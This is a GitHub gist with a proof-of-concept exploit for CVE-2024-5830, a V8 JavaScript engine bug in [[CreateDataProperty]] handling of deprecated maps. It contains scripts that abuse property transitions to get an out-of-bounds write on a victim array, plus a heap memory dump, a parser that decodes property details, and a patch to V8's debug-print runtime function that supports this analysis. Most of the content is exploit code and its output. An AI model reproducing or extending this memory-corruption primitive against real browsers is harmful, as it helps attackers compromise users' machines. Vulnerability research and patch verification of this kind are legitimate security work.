Last active
June 21, 2024 01:55
-
-
Save buptsb/c4666cce54b1beae54adb4a4bb9d0390 to your computer and use it in GitHub Desktop.
CVE-2024-5830: incorrect handing of deprecated map in [[CreateDataProperty]]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const N = 121; | |
| const heapnumber_key = 63; | |
| const prefix = "pp"; | |
| const first_getter_index = 4; | |
| var flag = false; | |
| function make_source_1() { | |
| let s = "" | |
| for (let i = 0; i <= N-2; i++) { | |
| if (i == first_getter_index) { | |
| s += `get ${prefix}${i}() { return ${i}; },`; | |
| } else { | |
| s += `${prefix}${i}: ${i}, `; | |
| } | |
| } | |
| s += `get ${prefix}${N-1}() { return callback(); },`; | |
| return `{${s}}`; | |
| } | |
| console.log(make_source_1()); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var victim; | |
| const N = 121; | |
| const heapnumber_key = 63; | |
| const prefix = "pp"; | |
| const property_details_value = 0x21; | |
| // u may need to change this `oob_write_offset` based on the victim array's addresss | |
| const oob_write_offset = 0x3e0000; | |
| const first_getter_index = 4; | |
| var flag = false; | |
| let source1 = {pp0: 0, pp1: 1, pp2: 2, pp3: 3, get pp4() { return 4; },pp5: 5, pp6: 6, pp7: 7, pp8: 8, pp9: 9, pp10: 10, pp11: 11, pp12: 12, pp13: 13, pp14: 14, pp15: 15, pp16: 16, pp17: 17, pp18: 18, pp19: 19, pp20: 20, pp21: 21, pp22: 22, pp23: 23, pp24: 24, pp25: 25, pp26: 26, pp27: 27, pp28: 28, pp29: 29, pp30: 30, pp31: 31, pp32: 32, pp33: 33, pp34: 34, pp35: 35, pp36: 36, pp37: 37, pp38: 38, pp39: 39, pp40: 40, pp41: 41, pp42: 42, pp43: 43, pp44: 44, pp45: 45, pp46: 46, pp47: 47, pp48: 48, pp49: 49, pp50: 50, pp51: 51, pp52: 52, pp53: 53, pp54: 54, pp55: 55, pp56: 56, pp57: 57, pp58: 58, pp59: 59, pp60: 60, pp61: 61, pp62: 62, pp63: 63, pp64: 64, pp65: 65, pp66: 66, pp67: 67, pp68: 68, pp69: 69, pp70: 70, pp71: 71, pp72: 72, pp73: 73, pp74: 74, pp75: 75, pp76: 76, pp77: 77, pp78: 78, pp79: 79, pp80: 80, pp81: 81, pp82: 82, pp83: 83, pp84: 84, pp85: 85, pp86: 86, pp87: 87, pp88: 88, pp89: 89, pp90: 90, pp91: 91, pp92: 92, pp93: 93, pp94: 94, pp95: 95, pp96: 96, pp97: 97, pp98: 98, pp99: 99, pp100: 100, pp101: 101, pp102: 102, pp103: 103, pp104: 104, pp105: 105, pp106: 106, pp107: 107, pp108: 108, pp109: 109, pp110: 110, pp111: 111, pp112: 112, pp113: 113, pp114: 114, pp115: 115, pp116: 116, pp117: 117, pp118: 118, pp119: 119, pp120: 1, get pp121() { return callback(); },}; | |
| let source2 = {pp0: 0, pp1: 1, pp2: 2, pp3: 3, get pp4() { return 4; },pp5: 5, pp6: 6, pp7: 7, pp8: 8, pp9: 9, pp10: 10, pp11: 11, pp12: 12, pp13: 13, pp14: 14, pp15: 15, pp16: 16, pp17: 17, pp18: 18, pp19: 19, pp20: 20, pp21: 21, pp22: 22, pp23: 23, pp24: 24, pp25: 25, pp26: 26, pp27: 27, pp28: 28, pp29: 29, pp30: 30, pp31: 31, pp32: 32, pp33: 33, pp34: 34, pp35: 35, pp36: 36, pp37: 37, pp38: 38, pp39: 39, pp40: 40, pp41: 41, pp42: 42, pp43: 43, pp44: 44, pp45: 45, pp46: 46, pp47: 47, pp48: 48, pp49: 49, pp50: 50, pp51: 51, pp52: 52, pp53: 53, pp54: 54, pp55: 55, pp56: 56, pp57: 57, pp58: 58, pp59: 59, pp60: 60, pp61: 61, pp62: 62, pp63: 63, pp64: 64, pp65: 65, pp66: 66, pp67: 67, pp68: 68, pp69: 69, pp70: 70, pp71: 71, pp72: 72, pp73: 73, pp74: 74, pp75: 75, pp76: 76, pp77: 77, pp78: 78, pp79: 79, pp80: 80, pp81: 81, pp82: 82, pp83: 83, pp84: 84, pp85: 85, pp86: 86, pp87: 87, pp88: 88, pp89: 89, pp90: 90, pp91: 91, pp92: 92, pp93: 93, pp94: 94, pp95: 95, pp96: 96, pp97: 97, pp98: 98, pp99: 99, pp100: 100, pp101: 101, pp102: 102, pp103: 103, pp104: 104, pp105: 105, pp106: 106, pp107: 107, pp108: 108, pp109: 109, pp110: 110, pp111: 111, pp112: 112, pp113: 113, pp114: 114, pp115: 115, pp116: 116, pp117: 117, pp118: 118, pp119: 119, pp120: 1, get pp121() { return 1; }, pp122: 1}; | |
| let source3 = { | |
| pp0: 1, | |
| pp1: 1, | |
| pp2: 1.1, | |
| pp3: 1, | |
| get pp4() { | |
| return 1; | |
| }, | |
| }; | |
| source1[`${prefix}${heapnumber_key}`] = oob_write_offset / 2; | |
| function cloneic_mega(src) { | |
| var obj = { ...src, __proto__: null}; | |
| return obj; | |
| } | |
| function callback() { | |
| flag = false; | |
| cloneic_mega(source3); | |
| // no more transitions allowed | |
| const max = 1024 + 512; | |
| // to speed up debugging, u could change `kMaxNumberOfTransitions` into 128 | |
| // const max = 128; | |
| for (let i = 0; i < max; i++) { | |
| let tmp = cloneic_mega(source3); | |
| eval(`tmp.${prefix}__${i} = ${i}`); | |
| } | |
| init_victim_array(); | |
| // %SystemBreak(); | |
| return property_details_value; | |
| } | |
| function init_victim_array() { | |
| victim = new Array(0x2000); | |
| victim.fill(0); | |
| %DebugPrint(victim); | |
| console.log("sum: ", victim.reduce((a, b) => a + b)); | |
| console.log("=============== oob write =============="); | |
| } | |
| %PrepareFunctionForOptimization(cloneic_mega); | |
| cloneic_mega(source2); | |
| flag = true; | |
| cloneic_mega(source1); | |
| console.log("sum: ", victim.reduce((a, b) => a + b)); | |
| // %SystemBreak(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| 74: corrupt details from data->accessors | |
| 121: double representation | |
| 30: add a new corrupted key | |
| */ | |
| let N = 121; | |
| let heapnumber_key = 63; | |
| let prefix = "pp"; | |
| let a = {}; | |
| for (let i = 0; i <= N-1; i++) { | |
| let v = i; | |
| if (i === heapnumber_key) { | |
| v = 0x253000; | |
| } | |
| eval(`a.${prefix}${i} = ${v}`); | |
| } | |
| // make sure `a` has transition with `pN` | |
| let a2 = {}; | |
| for (let i = 0; i <= N; i++) { | |
| eval(`a2.${prefix}${i} = ${i}`); | |
| } | |
| let b = {}; | |
| for (let i = 0; i <= 4; i++) { | |
| eval(`b.${prefix}${i} = ${i}`); | |
| } | |
| eval(`b.${prefix}4 = 1.1`); | |
| // no more transitions allowed | |
| const max = 1024 + 512; | |
| // to speed up debugging, u could change `kMaxNumberOfTransitions` into 128 | |
| // const max = 128; | |
| for (let i = 0; i < max; i++) { | |
| let v = {}; | |
| for (let i = 0; i <= 3; i++) { | |
| eval(`v.${prefix}${i} = ${i}`); | |
| } | |
| eval(`v.${prefix}4 = 1.1`); | |
| eval(`v.${prefix}___${i} = ${i}`); | |
| } | |
| let d; | |
| if (N === 74) { | |
| d = 0x41; | |
| } else if (N === 30) { | |
| // we need a inplace update incompatible value to early return | |
| d = 1.1; | |
| } else if (N === 121) { | |
| d = 0x21; | |
| } | |
| let victim = new Array(0x2000); | |
| victim.fill(0); | |
| %DebugPrint(victim); | |
| console.log("=============== oob write =============="); | |
| // %SystemBreak(); | |
| %CreateDataProperty(a, `${prefix}${N}`, d); | |
| %DebugPrint(victim.reduce((a, b) => a + b)); | |
| // %SystemBreak(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "offset": 0, | |
| "binary": "0x5f000000", | |
| "fieldIndex": 1, | |
| "repr": 4, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 4, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 7, | |
| "binary": "0x0d0000fe", | |
| "fieldIndex": 208, | |
| "repr": 1, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 10, | |
| "binary": "0x62000000", | |
| "fieldIndex": 1, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 14, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 17, | |
| "binary": "0x0d000081", | |
| "fieldIndex": 208, | |
| "repr": 1, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 20, | |
| "binary": "0x25000002", | |
| "fieldIndex": 592, | |
| "repr": 0, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 24, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 27, | |
| "binary": "0x150000db", | |
| "fieldIndex": 336, | |
| "repr": 1, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 30, | |
| "binary": "0x03000000", | |
| "fieldIndex": 48, | |
| "repr": 0, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 34, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 37, | |
| "binary": "0x0d0000ba", | |
| "fieldIndex": 208, | |
| "repr": 1, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 40, | |
| "binary": "0x76000000", | |
| "fieldIndex": 1, | |
| "repr": 3, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 44, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 47, | |
| "binary": "0x0d00010f", | |
| "fieldIndex": 208, | |
| "repr": 2, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 50, | |
| "binary": "0x40000000", | |
| "fieldIndex": 1, | |
| "repr": 0, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 54, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 57, | |
| "binary": "0x0d0000f0", | |
| "fieldIndex": 208, | |
| "repr": 1, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 60, | |
| "binary": "0x78000000", | |
| "fieldIndex": 1, | |
| "repr": 5, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 64, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 68, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 71, | |
| "binary": "0x0d000105", | |
| "fieldIndex": 208, | |
| "repr": 2, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 74, | |
| "binary": "0x02000002", | |
| "fieldIndex": 32, | |
| "repr": 0, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 78, | |
| "binary": "0x0a4003ff", | |
| "fieldIndex": 164, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 81, | |
| "binary": "0x0d00009d", | |
| "fieldIndex": 208, | |
| "repr": 1, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 84, | |
| "binary": "0x24000003", | |
| "fieldIndex": 576, | |
| "repr": 0, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 88, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 91, | |
| "binary": "0x0d0000ce", | |
| "fieldIndex": 208, | |
| "repr": 1, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 94, | |
| "binary": "0x57000000", | |
| "fieldIndex": 1, | |
| "repr": 1, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 98, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 101, | |
| "binary": "0x0d000118", | |
| "fieldIndex": 208, | |
| "repr": 2, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 104, | |
| "binary": "0x57000000", | |
| "fieldIndex": 1, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 108, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 111, | |
| "binary": "0x0d0000d7", | |
| "fieldIndex": 208, | |
| "repr": 1, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 114, | |
| "binary": "0x54000000", | |
| "fieldIndex": 1, | |
| "repr": 4, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 118, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 121, | |
| "binary": "0x0d00010e", | |
| "fieldIndex": 208, | |
| "repr": 2, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 124, | |
| "binary": "0x3c00000c", | |
| "fieldIndex": 960, | |
| "repr": 0, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 128, | |
| "binary": "0x084003ff", | |
| "fieldIndex": 132, | |
| "repr": 7, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 131, | |
| "binary": "0x1c8bac27", | |
| "fieldIndex": 456, | |
| "repr": 0, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 132, | |
| "binary": "0xa5296416", | |
| "fieldIndex": 1, | |
| "repr": 5, | |
| "kind": 1 | |
| }, | |
| { | |
| "offset": 137, | |
| "binary": "0xf4718b36", | |
| "fieldIndex": 1, | |
| "repr": 4, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 138, | |
| "binary": "0x62617265", | |
| "fieldIndex": 1, | |
| "repr": 7, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 139, | |
| "binary": "0xd7816eaa", | |
| "fieldIndex": 1, | |
| "repr": 1, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 140, | |
| "binary": "0x72756769", | |
| "fieldIndex": 1, | |
| "repr": 4, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 141, | |
| "binary": "0x6fd922ee", | |
| "fieldIndex": 1, | |
| "repr": 7, | |
| "kind": 0 | |
| }, | |
| { | |
| "offset": 147, | |
| "binary": "0xa5b37fd6", | |
| "fieldIndex": 1, | |
| "repr": 5, | |
| "kind": 1 | |
| } | |
| ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // d8 --soft-abort --allow-natives-syntax parser.js | |
| let s = `0x33be00000768: 0x000004cd 0x5f000000 0x0d000112 0x084003ff | |
| 0x33be00000778: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000788: 0x00000000 0x00000000 0x000004cd 0x57000000 | |
| 0x33be00000798: 0x0d0000cd 0x084003ff 0x00000085 0x00000085 | |
| 0x33be000007a8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be000007b8: 0x000004cd 0x56000000 0x0d0000fe 0x084003ff | |
| 0x33be000007c8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be000007d8: 0x00000000 0x00000000 0x000004cd 0x62000000 | |
| 0x33be000007e8: 0x0d000104 0x084003ff 0x00000085 0x00000085 | |
| 0x33be000007f8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000808: 0x000004cd 0x0200a603 0x0d000082 0x084003ff | |
| 0x33be00000818: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000828: 0x00000000 0x00000000 0x000004cd 0x00003000 | |
| 0x33be00000838: 0x0d000081 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000848: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000858: 0x000004cd 0x25000002 0x0d0000cc 0x084003ff | |
| 0x33be00000868: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000878: 0x00000000 0x00000000 0x000004cd 0x63000003 | |
| 0x33be00000888: 0x0d00010b 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000898: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be000008a8: 0x000004cd 0x58000000 0x150000db 0x084003ff | |
| 0x33be000008b8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be000008c8: 0x00000000 0x00000000 0x000004cd 0x03000000 | |
| 0x33be000008d8: 0x0d000103 0x084003ff 0x00000085 0x00000085 | |
| 0x33be000008e8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be000008f8: 0x000004cd 0x55000000 0x0d0000d9 0x084003ff | |
| 0x33be00000908: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000918: 0x00000000 0x00000000 0x000004cd 0x7c000000 | |
| 0x33be00000928: 0x0d0000ba 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000938: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000948: 0x000004cd 0x76000000 0x0d0000b1 0x084003ff | |
| 0x33be00000958: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000968: 0x00000000 0x00000000 0x000004cd 0x26000000 | |
| 0x33be00000978: 0x0d000106 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000988: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000998: 0x000004cd 0x39000000 0x0d00010f 0x084003ff | |
| 0x33be000009a8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be000009b8: 0x00000000 0x00000000 0x000004cd 0x40000000 | |
| 0x33be000009c8: 0x0d0000ee 0x084003ff 0x00000085 0x00000085 | |
| 0x33be000009d8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be000009e8: 0x000004cd 0x41000000 0x0d0000ef 0x084003ff | |
| 0x33be000009f8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000a08: 0x00000000 0x00000000 0x000004cd 0x42000000 | |
| 0x33be00000a18: 0x0d0000f0 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000a28: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000a38: 0x000004cd 0x78000000 0x0d0000b7 0x084003ff | |
| 0x33be00000a48: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000a58: 0x00000000 0x00000000 0x000004cd 0x1a000002 | |
| 0x33be00000a68: 0x0d0000fd 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000a78: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000a88: 0x00000a61 0x00000002 0x000004cd 0x3a000005 | |
| 0x33be00000a98: 0x0d000110 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000aa8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000ab8: 0x000004cd 0x02000001 0x0d000105 0x084003ff | |
| 0x33be00000ac8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000ad8: 0x00000000 0x00000000 0x000004cd 0x02000002 | |
| 0x33be00000ae8: 0x0d000105 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000af8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000b08: 0x000004cd 0x24000003 0x0d00009d 0x0a4003ff | |
| 0x33be00000b18: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000b28: 0x00000000 0x00000000 0x000004cd 0x24000003 | |
| 0x33be00000b38: 0x0d00009d 0x0a4003ff 0x00000085 0x00000085 | |
| 0x33be00000b48: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000b58: 0x000004cd 0x24000003 0x0d00009d 0x084003ff | |
| 0x33be00000b68: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000b78: 0x00000000 0x00000000 0x000004cd 0x49000000 | |
| 0x33be00000b88: 0x0d0000fa 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000b98: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000ba8: 0x000004cd 0x57000000 0x0d0000ce 0x084003ff | |
| 0x33be00000bb8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000bc8: 0x00000000 0x00000000 0x000004cd 0x57000000 | |
| 0x33be00000bd8: 0x0d0000d6 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000be8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000bf8: 0x000004cd 0x57000000 0x0d0000d1 0x084003ff | |
| 0x33be00000c08: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000c18: 0x00000000 0x00000000 0x000004cd 0x45000000 | |
| 0x33be00000c28: 0x0d000118 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000c38: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000c48: 0x000004cd 0x57000000 0x0d0000d0 0x084003ff | |
| 0x33be00000c58: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000c68: 0x00000000 0x00000000 0x000004cd 0x57000000 | |
| 0x33be00000c78: 0x0d0000d3 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000c88: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000c98: 0x000004cd 0x57000000 0x0d0000d7 0x084003ff | |
| 0x33be00000ca8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000cb8: 0x00000000 0x00000000 0x000004cd 0x54000000 | |
| 0x33be00000cc8: 0x0d0000fc 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000cd8: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000ce8: 0x000004cd 0x16000006 0x0d0000fb 0x084003ff | |
| 0x33be00000cf8: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000d08: 0x00000000 0x00000000 0x000004cd 0x38000000 | |
| 0x33be00000d18: 0x0d00010e 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000d28: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000d38: 0x000004cd 0x3c00000c 0x0d000114 0x084003ff | |
| 0x33be00000d48: 0x00000085 0x00000085 0x00000759 0x00000735 | |
| 0x33be00000d58: 0x00000000 0x00000000 0x000004cd 0x7700000f | |
| 0x33be00000d68: 0x0d0000b2 0x084003ff 0x00000085 0x00000085 | |
| 0x33be00000d78: 0x00000759 0x00000735 0x00000000 0x00000000 | |
| 0x33be00000d88: 0x000008f9 0x00000010 0x1c8bac27 0x1e222338 | |
| 0x33be00000d98: 0x000003dd 0xa5296416 0x00000006 0x676e656c | |
| 0x33be00000da8: 0x00006874 0x000003dd 0xe8a7d166 0x00000009 | |
| 0x33be00000db8: 0x746f7270 0x7079746f 0x00000065 0x000003dd | |
| 0x33be00000dc8: 0x98a624e6 0x00000004 0x656d616e 0x000003dd | |
| 0x33be00000dd8: 0xf4718b36 0x0000000a 0x6d756e65 0x62617265 | |
| 0x33be00000de8: 0x0000656c 0x000003dd 0xd7816eaa 0x0000000c | |
| 0x33be00000df8: 0x666e6f63 0x72756769 0x656c6261 0x000003dd | |
| 0x33be00000e08: 0x6fd922ee 0x00000005 0x756c6176 0x00000065 | |
| 0x33be00000e18: 0x000003dd 0x3236d696 0x00000008 0x74697277 | |
| 0x33be00000e28: 0x656c6261 0x000004a5 0xd5a60a66 0x00000001 | |
| 0x33be00000e38: 0x00000069 0x000004a5 0x8f5fb93a 0x00000001 | |
| 0x33be00000e48: 0x00000069 0x000004a5 0xa5b37fd6 0x00000001 | |
| 0x33be00000e58: 0x00000069 0x000004a5 0xb13ef39e 0x00000001 | |
| 0x33be00000e68: 0x00000069 0x000004a5 0xe5db2e66 0x00000001 | |
| 0x33be00000e78: 0x00000069 0x00000bf9 0x00000012 0x00000000 | |
| 0x33be00000e88: 0x00000000 0x00000002 0x00000002 0x00000000 | |
| 0x33be00000e98: 0x00000000 0x00000069 0x00000069 0x00000069 | |
| 0x33be00000ea8: 0x00000bd1 0x00000008 0x00000000 0x00000000 | |
| 0x33be00000eb8: 0x00000000 0x00000000 0x000008f9 0x00000000 | |
| 0x33be00000ec8: 0x00000769 0x40000000 0x00000000 0x00000000 | |
| 0x33be00000ed8: 0x00000999 0x00000000 0x00000809 0x00000000 | |
| 0x33be00000ee8: 0x80000000 0x00000809 0x00000000 0x7ff80000 | |
| 0x33be00000ef8: 0x00000809 0xfff7ffff 0xfff7ffff 0x00000809 | |
| 0x33be00000f08: 0x00000000 0x7ff00000 0x00000809 0x00000000 | |
| 0x33be00000f18: 0xfff00000 0x00000809 0xffffffff 0x433fffff | |
| 0x33be00000f28: 0x00000809 0xffe00000 0x41efffff 0x00000809 | |
| 0x33be00000f38: 0x00000000 0xc1d00000 0x00000809 0x00000000 | |
| 0x33be00000f48: 0x41d00000 0x000004cd 0x44000006 0x0d000084`; | |
| let lines = s.split("\n"); | |
| lines = lines.map(l => l.split(":")[1]); | |
| let items = []; | |
| lines.map(line => { | |
| let a = line.split(" ").filter(_ => _); | |
| items.push(a); | |
| }) | |
| function test(v, flag) { | |
| let n = parseInt(v, 16); | |
| // return `v8::base::BitField<unsigned int, 19, 10>::decode(Smi::ToInt(*target) >> 1)` | |
| let result = eval(`%DebugPrint(${n}, ${flag})`) | |
| return result; | |
| } | |
| let counter = 0; | |
| let results = []; | |
| for (let i = 0; i < items.length; i++) { | |
| items[i].map(b => { | |
| if (counter % 3 !== 1) { | |
| counter++; | |
| return; | |
| } | |
| counter++; | |
| results.push({ | |
| offset: Math.floor(counter / 3), | |
| binary: b, | |
| fieldIndex: test(b, 0), | |
| repr: test(b, 1), | |
| kind: test(b, 2), | |
| }); | |
| }) | |
| } | |
| results = results.filter(o => o.fieldIndex); | |
| console.log(JSON.stringify(results)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RUNTIME_FUNCTION(Runtime_DebugPrint) { | |
| SealHandleScope shs(isolate); | |
| if (args.length() == 0) { | |
| // This runtime method has variable number of arguments, but if there is no | |
| // argument, undefined behavior may happen. | |
| return ReadOnlyRoots(isolate).undefined_value(); | |
| } | |
| // This is exposed to tests / fuzzers; handle variable arguments gracefully. | |
| std::unique_ptr<std::ostream> output_stream(new StdoutStream()); | |
| if (args.length() == 2) { | |
| if (IsSmi(args[1])) { | |
| HandleScope hs(isolate); | |
| auto v = Smi::ToInt(*args.at<Smi>(0)); | |
| auto flag = Smi::ToInt(*args.at<Smi>(1)); | |
| int result = 0; | |
| if (flag == 0) { | |
| result = PropertyDetails::FieldIndexField::decode(v >> 1); | |
| } else if (flag == 1) { | |
| result = PropertyDetails::RepresentationField::decode(v >> 1); | |
| } else if (flag == 2) { | |
| result = static_cast<int>(PropertyDetails::KindField::decode(v >> 1)); | |
| } | |
| return *isolate->factory()->NewHeapNumber(result); | |
| } | |
| } | |
| Tagged<MaybeObject> maybe_object(*args.address_of_arg_at(0)); | |
| DebugPrintImpl(maybe_object, *output_stream); | |
| return args[0]; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment